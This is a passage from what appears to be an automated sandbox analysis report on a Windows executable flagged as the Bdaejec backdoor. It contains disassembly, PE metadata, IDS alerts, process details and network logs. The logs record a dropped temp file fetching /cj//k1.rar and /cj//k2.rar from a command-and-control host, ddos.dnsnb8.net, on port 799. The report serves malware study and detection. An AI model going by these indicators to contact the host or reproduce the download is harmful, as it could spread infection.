                        mov ebx, dword ptr [ecx+20h]
                        mov esi, dword ptr [ecx+24h]
                        mov ecx, dword ptr [ecx+18h]
                        add esi, eax
                        add edi, eax
                        add ebx, eax
                        xor edx, edx
                        mov dword ptr [ebp-30h], esi
                        mov dword ptr [ebp-1Ch], edx
                        mov dword ptr [ebp-34h], ecx
                        cmp edx, dword ptr [ebp-34h]
                        jnc 00007FFBA8B95E5Eh
                        movzx ecx, word ptr [esi+edx*2]
                        mov edx, dword ptr [ebx+edx*4]
                        mov esi, dword ptr [edi+ecx*4]
                        add edx, eax
                        mov ecx, dword ptr [edx]
                        add esi, eax
                        cmp ecx, 4D746547h
                        jne 00007FFBA8B95D64h
                        cmp dword ptr [edx+04h], 6C75646Fh
                        jne 00007FFBA8B95D5Bh
                        Programming Language:
                        • [C++] VS2013 build 21005
                        • [ASM] VS2013 build 21005
                        • [ C ] VS2013 build 21005
                        • [C++] VS2013 UPD3 build 30723
                        • [RES] VS2013 build 21005
                        • [LNK] VS2013 UPD3 build 30723
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d58a40x168.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x33b0000x4810.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x25cf700x38.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2a4f600x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x25c0000xc70.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x25941a0x2596006d614c1b6c91e57cc6f893e8d5353b4bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        CONST0x25b0000x500x2009d2c259028ec9a2bead2fdb719de93b6False0.171875data1.4183627461897457IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x25c0000x7dad20x7dc00d165cf31a244df646478cfc7b91b27cfFalse0.3152025347912525data5.278930315697064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x2da0000x60c900x15000306075b28383012b063734f6e211a392False0.23208472842261904data3.7836579408963225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x33b0000x48100x4a00cab02b81ece1759cd51a94aca6929323False0.27322635135135137data4.038463935393645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        A#uq0x3400000x50000x4200e0c06908751f6768e214a43c990d414cFalse0.7772845643939394data6.934503720718857IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_CURSOR0x33baa80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                        RT_CURSOR0x33bbdc0xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                        RT_CURSOR0x33bc900x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                        RT_CURSOR0x33bdc40x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                        RT_CURSOR0x33bef80x134dataEnglishUnited States0.37337662337662336
                        RT_CURSOR0x33c02c0x134dataEnglishUnited States0.37662337662337664
                        RT_CURSOR0x33c1600x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                        RT_CURSOR0x33c2940x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                        RT_CURSOR0x33c3c80x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                        RT_CURSOR0x33c4fc0x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                        RT_CURSOR0x33c6300x134dataEnglishUnited States0.44155844155844154
                        RT_CURSOR0x33c7640x134dataEnglishUnited States0.4155844155844156
                        RT_CURSOR0x33c8980x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                        RT_CURSOR0x33c9cc0x134dataEnglishUnited States0.2662337662337662
                        RT_CURSOR0x33cb000x134dataEnglishUnited States0.2824675324675325
                        RT_CURSOR0x33cc340x134dataEnglishUnited States0.3246753246753247
                        RT_BITMAP0x33cd680xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                        RT_BITMAP0x33ce200x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                        RT_ICON0x33cf640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.24059139784946237
                        RT_DIALOG0x33d24c0xe8dataEnglishUnited States0.6336206896551724
                        RT_DIALOG0x33d3340x34dataEnglishUnited States0.9038461538461539
                        RT_STRING0x33d3680x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                        RT_STRING0x33d3ec0x2adataEnglishUnited States0.5476190476190477
                        RT_STRING0x33d4180x184dataEnglishUnited States0.48711340206185566
                        RT_STRING0x33d59c0x4e6dataEnglishUnited States0.37719298245614036
                        RT_STRING0x33da840x264dataEnglishUnited States0.3333333333333333
                        RT_STRING0x33dce80x2dadataEnglishUnited States0.3698630136986301
                        RT_STRING0x33dfc40x8adataEnglishUnited States0.6594202898550725
                        RT_STRING0x33e0500xacdataEnglishUnited States0.45348837209302323
                        RT_STRING0x33e0fc0xdedataEnglishUnited States0.536036036036036
                        RT_STRING0x33e1dc0x4a8dataEnglishUnited States0.3221476510067114
                        RT_STRING0x33e6840x228dataEnglishUnited States0.4003623188405797
                        RT_STRING0x33e8ac0x2cdataEnglishUnited States0.5227272727272727
                        RT_STRING0x33e8d80x53cdataEnglishUnited States0.2947761194029851
                        RT_GROUP_CURSOR0x33ee140x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0
                        RT_GROUP_CURSOR0x33ee380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ee4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ee600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ee740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ee880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ee9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33eeb00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33eec40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33eed80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33eeec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ef000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ef140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ef280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_CURSOR0x33ef3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                        RT_GROUP_ICON0x33ef500x14dataEnglishUnited States1.2
                        RT_VERSION0x33ef640x62cdataEnglishUnited States0.4917721518987342
                        RT_MANIFEST0x33f5900x280XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.553125
                        DLLImport
                        KERNEL32.dlllstrcmpA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, SetThreadPriority, GetAtomNameA, FileTimeToSystemTime, GetThreadLocale, GlobalFlags, CompareStringW, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetOEMCP, GetCPInfo, GetACP, GetCurrentDirectoryA, DeleteFileA, FlushFileBuffers, GetFullPathNameA, LockFile, SetEndOfFile, SetFilePointer, UnlockFile, DuplicateHandle, GetCurrentProcess, LoadLibraryExA, GetShortPathNameA, lstrcmpiA, MoveFileA, GetVolumeInformationA, GetStringTypeExA, GetWindowsDirectoryA, FileTimeToLocalFileTime, GetFileAttributesA, GetFileAttributesExA, GetFileSizeEx, GetFileTime, LocalFileTimeToFileTime, SetFileAttributesA, SetFileTime, GetTickCount, lstrcpyA, VerSetConditionMask, VerifyVersionInfoA, GetTempPathA, GetTempFileNameA, GetProfileIntA, VirtualProtect, GetDiskFreeSpaceA, ReplaceFileA, GetUserDefaultLCID, FindResourceExW, LocalLock, LocalUnlock, GetSystemTimeAsFileTime, RtlUnwind, GetCommandLineA, GetSystemInfo, VirtualAlloc, VirtualQuery, CreateThread, ExitThread, ExitProcess, GetModuleHandleExW, AreFileApisANSI, IsDebuggerPresent, IsProcessorFeaturePresent, HeapQueryInformation, SetStdHandle, GetFileType, IsValidCodePage, GetTimeZoneInformation, GetStdHandle, GetStartupInfoW, GetVersionExA, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, CreateEventW, TerminateProcess, CreateSemaphoreW, FatalAppExitA, SetConsoleCtrlHandler, GetStringTypeW, GetConsoleCP, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetDateFormatW, GetTimeFormatW, LCMapStringW, IsValidLocale, EnumSystemLocalesW, OutputDebugStringW, WriteConsoleW, CreateFileW, SetEnvironmentVariableA, CreateEventA, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, LoadLibraryW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, EnterCriticalSection, EncodePointer, OutputDebugStringA, MultiByteToWideChar, CopyFileA, FormatMessageA, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, SetLastError, ReleaseSemaphore, OpenSemaphoreA, CreateSemaphoreA, WaitForSingleObject, Sleep, SearchPathA, GetFileSize, DeviceIoControl, LocalFree, LocalAlloc, WriteFile, GetVersion, GetLocalTime, ReadFile, CloseHandle, FindNextFileA, CreateFileA, SystemTimeToFileTime, GetSystemTime, FindClose, FindFirstFileA, GetProcAddress, SetErrorMode, FreeLibrary, GetModuleHandleA, GetModuleFileNameA, GetEnvironmentVariableA, GetCurrentProcessId, GetCurrentThread, ResumeThread, QueryPerformanceCounter, SuspendThread, LoadLibraryA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionEx, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, GetLastError, RaiseException, LocalReAlloc, DecodePointer
                        USER32.dllIsRectEmpty, GetNextDlgGroupItem, MessageBeep, CreatePopupMenu, GetMenuDefaultItem, BringWindowToTop, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, SetRectEmpty, LoadImageA, GetMenuBarInfo, UnpackDDElParam, ReuseDDElParam, RegisterClipboardFormatA, DrawFocusRect, DrawIconEx, GetIconInfo, GetAsyncKeyState, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, MapVirtualKeyA, GetKeyNameTextA, UnionRect, GetSystemMenu, SetParent, PostThreadMessageA, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, LoadImageW, DrawEdge, DrawFrameControl, SetWindowRgn, IsMenu, UpdateLayeredWindow, MonitorFromPoint, TrackMouseEvent, LoadMenuW, GetComboBoxInfo, IsZoomed, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetDCEx, LockWindowUpdate, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, SetCursorPos, SetClassLongA, GetDoubleClickTime, CopyIcon, SetMenuDefaultItem, ModifyMenuA, CharUpperBuffA, FrameRect, EnumChildWindows, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, IsClipboardFormatAvailable, GetUpdateRect, SubtractRect, SendNotifyMessageA, InSendMessage, CreateMenu, DestroyCursor, GetWindowRgn, DrawIcon, WindowFromDC, GetTabbedTextExtentA, GetTabbedTextExtentW, RealChildWindowFromPoint, IntersectRect, InflateRect, LoadCursorA, GetSystemMetrics, MapDialogRect, SetWindowContextHelpId, GetWindowThreadProcessId, SetCursor, ShowOwnedPopups, PostQuitMessage, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetRect, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, GetClassNameA, GetClassLongA, SetWindowLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, MapWindowPoints, MessageBoxA, AdjustWindowRectEx, GetWindowRect, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, PostMessageA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, LoadBitmapW, GetParent, SetMenuItemInfoA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, FillRect, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, GetDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, RemoveMenu, AppendMenuA, InsertMenuA, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringA, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SendMessageA, GetFocus, InvalidateRgn, CopyAcceleratorTableA, OffsetRect, CharNextA, LoadCursorW, WindowFromPoint, SetCapture, ReleaseCapture, WaitMessage, CharUpperA, DestroyIcon, IsIconic, InvalidateRect, KillTimer, SetTimer, DeleteMenu, GetDialogBaseUnits, CopyImage, SystemParametersInfoA, GetMenuItemInfoA, SetDlgItemTextA, DestroyMenu, GetSysColorBrush
                        GDI32.dllCreateDCA, BitBlt, CreateBitmap, CreateCompatibleDC, CreateDIBPatternBrushPt, CreateHatchBrush, SetWindowExtEx, CreatePatternBrush, GetDeviceCaps, GetTextMetricsA, StartDocA, StartPage, EndPage, CreatePen, SetViewportOrgEx, SetViewportExtEx, PolylineTo, PolyBezierTo, ExtTextOutA, TextOutA, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Escape, ExcludeClipRect, MoveToEx, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetTextJustification, PlayMetaFileRecord, GetObjectA, ExtCreatePen, SetArcDirection, SelectClipPath, PolyDraw, ArcTo, SetColorAdjustment, ModifyWorldTransform, SetWorldTransform, GetClipBox, CopyMetaFileA, DeleteMetaFile, CreateMetaFileA, CloseMetaFile, GetTextFaceA, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, GetTextExtentPoint32W, GetTextExtentPointA, ScaleWindowExtEx, CombineRgn, CreateFontIndirectA, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, DPtoLP, GetTextExtentPoint32A, GetBkColor, GetTextColor, GetRgnBox, CreateCompatibleBitmap, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, CreateFontA, GetCharWidthA, StretchDIBits, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExA, OffsetRgn, CreateRoundRectRgn, GetCurrentObject, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, EnumMetaFile
                        COMDLG32.dllGetOpenFileNameA
                        ADVAPI32.dllRegSetValueA, RegDeleteKeyA, RegDeleteValueA, RegEnumKeyA, RegQueryValueA, RegEnumValueA, RegOpenKeyExW, RegEnumKeyExA, SetFileSecurityA, GetFileSecurityA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                        MSIMG32.dllTransparentBlt, AlphaBlend
                        SHLWAPI.dllPathStripToRootA, PathIsUNCA, PathRemoveFileSpecW, PathRemoveExtensionA, PathFindFileNameA, PathFindExtensionA, StrFormatKBSizeA
                        UxTheme.dllGetWindowTheme, GetThemeSysColor, IsAppThemed, GetThemePartSize, GetCurrentThemeName, GetThemeColor, CloseThemeData, OpenThemeData, DrawThemeParentBackground, IsThemeBackgroundPartiallyTransparent, DrawThemeBackground, DrawThemeText
                        oledlg.dll
                        OLEACC.dllLresultFromObject, CreateStdAccessibleObject, AccessibleObjectFromWindow
                        gdiplus.dllGdipDeleteGraphics, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipDrawImageI, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipCloneImage, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize
                        IMM32.dllImmGetContext, ImmGetOpenStatus, ImmReleaseContext
                        WINMM.dllPlaySoundA
                        WINSPOOL.DRVDocumentPropertiesA, GetJobA, OpenPrinterA, ClosePrinter
                        SHELL32.dllDragFinish, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, ShellExecuteA, SHGetMalloc, SHBrowseForFolderA, SHAppBarMessage, ShellExecuteExA, DragQueryFileA
                        ole32.dllStgOpenStorage, StgIsStorageFile, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, CreateGenericComposite, CreateItemMoniker, WriteClassStm, OleCreate, OleCreateFromData, StgCreateDocfile, OleCreateStaticFromData, OleCreateLinkToFile, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, PropVariantCopy, OleRegGetMiscStatus, OleRegEnumVerbs, OleQueryLinkFromData, OleQueryCreateFromData, OleIsRunning, CoGetMalloc, GetRunningObjectTable, CreateDataAdviseHolder, CreateOleAdviseHolder, OleLockRunning, OleSetMenuDescriptor, DoDragDrop, CreateStreamOnHGlobal, CoRegisterMessageFilter, OleIsCurrentClipboard, OleFlushClipboard, OleSetClipboard, CoRevokeClassObject, CoRegisterClassObject, OleUninitialize, StringFromCLSID, CoTaskMemAlloc, OleInitialize, CoFreeUnusedLibraries, OleRun, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoInitializeEx, CoDisconnectObject, StringFromGUID2, CLSIDFromProgID, CLSIDFromString, CoInitialize, CoCreateInstance, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, OleCreateLinkFromData
                        OLEAUT32.dllLoadTypeLib, SysStringLen, VariantChangeType, VariantClear, RegisterTypeLib, LoadRegTypeLib, VariantInit, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SysAllocStringLen, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayLock, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, SysAllocStringByteLen, SysStringByteLen, SafeArrayCreate, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, OleCreateFontIndirect, SysAllocString, SysFreeString
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                        2024-07-24T22:28:23.363275+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup4936253192.168.2.71.1.1.1
                        2024-07-24T22:28:24.383859+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49699799192.168.2.744.221.84.105
                        2024-07-24T22:28:29.875738+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49700799192.168.2.744.221.84.105
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 24, 2024 22:28:23.967488050 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:23.972397089 CEST7994969944.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:23.972511053 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:23.977816105 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:23.983180046 CEST7994969944.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:24.383795977 CEST7994969944.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:24.383842945 CEST7994969944.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:24.383858919 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:24.383893967 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:24.385102034 CEST49699799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:24.390008926 CEST7994969944.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:29.435621023 CEST49700799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:29.441241026 CEST7994970044.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:29.441385984 CEST49700799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:29.441939116 CEST49700799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:29.447062016 CEST7994970044.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:29.875655890 CEST7994970044.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:29.875674963 CEST7994970044.221.84.105192.168.2.7
                        Jul 24, 2024 22:28:29.875737906 CEST49700799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:29.893846035 CEST49700799192.168.2.744.221.84.105
                        Jul 24, 2024 22:28:29.898829937 CEST7994970044.221.84.105192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 24, 2024 22:28:23.363275051 CEST4936253192.168.2.71.1.1.1
                        Jul 24, 2024 22:28:23.960669994 CEST53493621.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 24, 2024 22:28:23.363275051 CEST192.168.2.71.1.1.10x9b24Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 24, 2024 22:28:23.960669994 CEST1.1.1.1192.168.2.70x9b24No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                        • ddos.dnsnb8.net:799
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.74969944.221.84.1057993044C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        TimestampBytes transferredDirectionData
                        Jul 24, 2024 22:28:23.977816105 CEST288OUTGET /cj//k1.rar HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: ddos.dnsnb8.net:799
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.74970044.221.84.1057993044C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        TimestampBytes transferredDirectionData
                        Jul 24, 2024 22:28:29.441939116 CEST288OUTGET /cj//k2.rar HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: ddos.dnsnb8.net:799
                        Connection: Keep-Alive


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:1
                        Start time:16:28:19
                        Start date:24/07/2024
                        Path:C:\Users\user\Desktop\biKy3nZEyJ.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\biKy3nZEyJ.exe"
                        Imagebase:0x400000
                        File size:3'101'704 bytes
                        MD5 hash:6963BB0311DED02BA57657BA4A61D427
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:16:28:19
                        Start date:24/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
                        Imagebase:0xf70000
                        File size:15'872 bytes
                        MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:moderate
                        Has exited:true

                        Target ID:15
                        Start time:16:28:31
                        Start date:24/07/2024
                        Path:C:\Windows\SysWOW64\WerFault.exe
